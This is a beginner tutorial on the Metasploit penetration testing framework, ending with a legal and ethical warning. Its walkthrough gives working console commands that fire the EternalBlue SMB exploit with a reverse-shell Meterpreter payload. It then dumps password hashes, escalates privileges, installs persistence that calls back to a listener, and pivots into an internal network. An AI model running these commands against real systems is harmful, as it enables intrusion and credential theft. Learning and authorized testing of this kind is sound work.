Getting Started with Metasploit
The Metasploit Framework is the world's most used penetration testing software. This tutorial walks you through from installation to your first exploit.
Architecture Overview
Metasploit's modular architecture consists of:
- Exploits: Code that takes advantage of vulnerabilities
- Payloads: Code that runs after exploitation (shells, Meterpreter)
- Auxiliaries: Scanning, fuzzing, and information gathering modules
- Post-Exploitation: Modules for privilege escalation, persistence, pivoting
- Encoders: Obfuscation to evade detection
Basic Workflow
Start Metasploit console
msfconsoleSearch for exploits
msf6 > search type:exploit platform:windows smbSelect an exploit
msf6 > use exploit/windows/smb/ms17_010_eternalblueShow options
msf6 exploit(ms17_010_eternalblue) > show optionsSet target and payload
msf6 > set RHOSTS 192.168.1.100
msf6 > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.1.50Execute
msf6 > exploit
Meterpreter Post-Exploitation
Once you have a Meterpreter session:
System information
meterpreter > sysinfoDump password hashes
meterpreter > hashdumpScreenshot
meterpreter > screenshotPrivilege escalation
meterpreter > getsystemPersistence
meterpreter > run persistence -U -i 10 -p 4444 -r 192.168.1.50Pivoting
meterpreter > run autoroute -s 10.0.0.0/24
Important: Legal & Ethical Considerations
Always ensure you have written authorization before testing. Unauthorized access to computer systems is illegal. Use dedicated lab environments or authorized bug bounty programs.
Conclusion
Metasploit is an incredibly powerful framework. Master it in a controlled lab environment before using it in production assessments.